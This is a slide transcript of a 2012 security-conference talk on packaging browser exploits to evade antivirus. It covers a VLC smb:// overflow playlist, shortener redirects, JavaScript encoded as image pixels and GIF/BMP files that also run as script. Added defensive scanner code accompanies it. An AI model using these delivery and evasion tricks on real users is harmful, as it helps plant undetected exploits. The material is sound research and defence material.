When Bad Things Come In Good Packages

Published on November 29, 2012

Author: saumilshah

Source: slideshare.net

Description

My DEEPSEC 2012 talk explores the fine art of packaging when it comes to exploits. No, this is not another talk about packers or crypters. We are talking STYLE! A successful exploit is one that is innovatively delivered, in style. We shall be talking about a number of sneaky, funny and innovative techniques for delivering exploits to their doorsteps without annoyances like anti-virus or content filtering getting in the way.

This talk goes beyond the obvious obfuscation. We combine the power of web hacking, the power of sophisticated exploit development and goofball creativity to ensure that exploits get delivered and detonate on time, as planned. Did you know you can literally paint an exploit on canvas? Have you heard of chameleon JavaScript? This and more in the talk!

when Bad Things come in Good packages
Saumil Shah, net-square
DEEPSEC 2012

# who am i
Saumil Shah, CEO Net-Square.
•  Hacker, Speaker, Trainer, Author - 15 yrs in Infosec.
•  M.S. Computer Science Purdue University.
•  saumil@net-square.com
•  LinkedIn: saumilshah
•  Twitter: @therealsaumil

My area of work
•  Penetration Testing
•  Reverse Engineering
•  Exploit Writing
•  New Research
•  Offensive Security
•  Attack Defense
•  Conference Speaker
•  Conference Trainer
•  "Eyes and ears open"

When two forces combine...
•  Web Hacking
•  Binary Exploits

SNEAKY LETHAL

302 IMG JS HTML5

VLC smb overflow
•  smb://example.com@0.0.0.0/foo/#{AAAAAAAA....}
•  Classic Stack Overflow.

VLC XSPF file
<?xml version="1.0" encoding="UTF-8"?>
<playlist version="1"
  xmlns="http://xspf.org/ns/0/"
  xmlns:vlc="http://www.videolan.org/vlc/playlist/ns/0/">
  <title>Playlist</title>
  <trackList>
    <track>
      <location>
        smb://example.com@0.0.0.0/foo/#{AAAAAAAA....}
      </location>
      <extension
        application="http://www.videolan.org/vlc/playlist/0">
        <vlc:id>0</vlc:id>
      </extension>
    </track>
  </trackList>
</playlist>

Alpha Encoded Exploit, Tiny URL: ZOMFG!

100% Pure Alphanum!

VLC smb overflow - HTMLized!
<embed type="application/x-vlc-plugin"
  width="320" height="200"
  target="http://tinyurl.com/ycctrzf"
  id="vlc" />

301 Redirect from tinyurl
HTTP/1.1 301 Moved Permanently
X-Powered-By: PHP/5.2.12
Location: smb://example.com@0.0.0.0/foo/#{[alphanumeric-encoded payload omitted]}
Content-type: text/html
Content-Length: 0
Connection: close
Server: TinyURL/1.6

Exploits as Images - 1
•  Grayscale encoding (0-255).
•  1 pixel = 1 character.
•  Perfectly valid image.
•  Decode and Execute!

I'm an evil Javascript
I'm an innocent image

[Slide: minified JavaScript exploit source (the packv() helper, the addressof table of ROP gadget addresses, and call_ntallocatevirtualmemory()) laid out in 16-character columns, shown with the label <CANVAS>]

See no eval()

Same Same No Different!
var a = eval(str);
a = (new Function(str))();
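
A scanner-side view of the grayscale-image slide and the eval()/new Function() slide, as an added example that is not code from the talk: it maps decoded grayscale samples back to characters and flags images whose pixels read as script, treating both execution forms as the same sink. The threshold, keyword list, function names and sample pixel arrays are assumptions constructed for illustration.

```javascript
// Added example, not from the talk. Input is an array of decoded 8-bit
// grayscale samples (1 pixel = 1 character, as on the slide).
const SINKS = [
  { name: "eval", re: /\beval\s*\(/ },
  { name: "Function constructor", re: /\bFunction\s*\(/ },
];
const KEYWORDS = ["function", "var ", "return", "unescape(", "document."];
const MIN_PRINTABLE = 0.95; // assumed threshold, tune on real traffic

function isTextByte(b) {
  return (b >= 0x20 && b <= 0x7e) || b === 0x09 || b === 0x0a || b === 0x0d;
}

function analyzeGrayscale(pixels) {
  if (pixels.length === 0) {
    return { printableRatio: 0, sinks: [], keywords: [], suspicious: false };
  }
  let printable = 0;
  for (const p of pixels) if (isTextByte(p)) printable++;
  const printableRatio = printable / pixels.length;
  const text = Array.from(pixels, (p) => String.fromCharCode(p)).join("");
  const sinks = SINKS.filter((s) => s.re.test(text)).map((s) => s.name);
  const keywords = KEYWORDS.filter((k) => text.includes(k));
  // A flat picture can be entirely "printable"; require script tokens as well.
  const suspicious =
    printableRatio >= MIN_PRINTABLE && (sinks.length > 0 || keywords.length >= 2);
  return { printableRatio, sinks, keywords, suspicious };
}

// Constructed samples: a one-line script as pixels, a 0..255 ramp, a flat image.
const toPixels = (s) => Uint8Array.from(s, (c) => c.charCodeAt(0));
const scriptPixels = toPixels('var a = (new Function("return 1+1"))();');
const gradient = Uint8Array.from({ length: 256 }, (_, i) => i);
const flatGray = new Uint8Array(64).fill(0x41);

for (const sample of [scriptPixels, gradient, flatGray]) {
  console.log(analyzeGrayscale(sample));
}
```

A rule that only searches for `eval(` would return an empty sink list for the first sample; a Content-Security-Policy without `'unsafe-eval'` blocks both forms in the browser.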

IMAJS
I iz being a Javascript

IMAJS
<img src="itsatrap.gif">
<script src="itsatrap.gif"></script>

IMAJS-GIF Browser Support

| Height Width | Browser/Viewer | Image Renders? | Javascript Executes? |
|---|---|---|---|
| 2f 2a 00 00 | Firefox | yes | yes |
| 2f 2a 00 00 | Safari | yes | yes |
| 2f 2a 00 00 | IE | no | yes |
| 2f 2a 00 00 | Chrome | yes | yes |
| 2f 2a 00 00 | Opera | ? | ? |
| 2f 2a 00 00 | Preview.app | yes | - |
| 2f 2a 00 00 | XP Image Viewer | no | - |
| 2f 2a 00 00 | Win 7 Preview | yes | - |

IMAJS-BMP Browser Support

| Height Width | Browser/Viewer | Image Renders? | Javascript Executes? |
|---|---|---|---|
| 2f 2a 00 00 | Firefox | yes | yes |
| 2f 2a 00 00 | Safari | yes | yes |
| 2f 2a 00 00 | IE | yes | yes |
| 2f 2a 00 00 | Chrome | yes | yes |
| 2f 2a 00 00 | Opera | yes | yes |
| 2f 2a 00 00 | Preview.app | yes | - |
| 2f 2a 00 00 | XP Image Viewer | yes | - |
| 2f 2a 00 00 | Win 7 Preview | yes | - |
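
The header value in the two tables above, turned into an upload-side check (an added example, not code from the talk): it flags GIF and BMP files whose bytes immediately after the magic are 2f 2a, which is "/*" in ASCII. The function names and sample byte arrays are constructed for illustration.

```javascript
// Added example, not from the talk. Flags GIF/BMP files whose bytes right
// after the magic are 2f 2a ("/*"), the value listed in the tables above.
const MAGICS = [
  { format: "GIF", magic: "GIF89a" },
  { format: "GIF", magic: "GIF87a" },
  { format: "BMP", magic: "BM" },
];

const hex = (bytes) =>
  Array.from(bytes, (b) => b.toString(16).padStart(2, "0")).join(" ");

function startsWithAscii(bytes, s) {
  if (bytes.length < s.length) return false;
  for (let i = 0; i < s.length; i++) {
    if (bytes[i] !== s.charCodeAt(i)) return false;
  }
  return true;
}

function findPair(bytes, a, b, from) {
  for (let i = from; i + 1 < bytes.length; i++) {
    if (bytes[i] === a && bytes[i + 1] === b) return i;
  }
  return -1;
}

function inspectImage(bytes) {
  const hit = MAGICS.find((m) => startsWithAscii(bytes, m.magic));
  const format = hit ? hit.format : null;
  if (!hit || bytes.length < hit.magic.length + 4) {
    return { format, field: null, suspicious: false, commentClosedAt: -1 };
  }
  const off = hit.magic.length;
  const opens = bytes[off] === 0x2f && bytes[off + 1] === 0x2a; // "/*"
  return {
    format,
    field: hex(bytes.slice(off, off + 4)),
    suspicious: opens,
    // Offset of a later "*/", which would end the comment if parsed as script.
    commentClosedAt: opens ? findPair(bytes, 0x2a, 0x2f, off + 2) : -1,
  };
}

// Constructed samples: header bytes only, no pixel data.
const ascii = (s) => Array.from(s, (c) => c.charCodeAt(0));
const benignGif = Uint8Array.from([...ascii("GIF89a"), 0x40, 0x01, 0xc8, 0x00, 0xf7, 0, 0]);
const imajsGif = Uint8Array.from([...ascii("GIF89a"), 0x2f, 0x2a, 0, 0, 0x80, 0, 0, ...ascii("*/")]);
const imajsBmp = Uint8Array.from([...ascii("BM"), 0x2f, 0x2a, 0, 0, 0, 0, 0, 0, 0x36, 0, 0, 0]);
```

Serving uploads with their real image Content-Type together with `X-Content-Type-Options: nosniff` makes browsers refuse to execute the response when it is requested by a `<script>` element.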

The αq Exploit

Demo IMAJS αq FTW!

Alpha encoded exploit code IMAJS CANVAS "loader" script

These are not the sploits you're looking for

No virus threat detected

The FUTURE?

when Bad Things come in Good packages
THE END
@therealsaumil
saumil@net-square.com
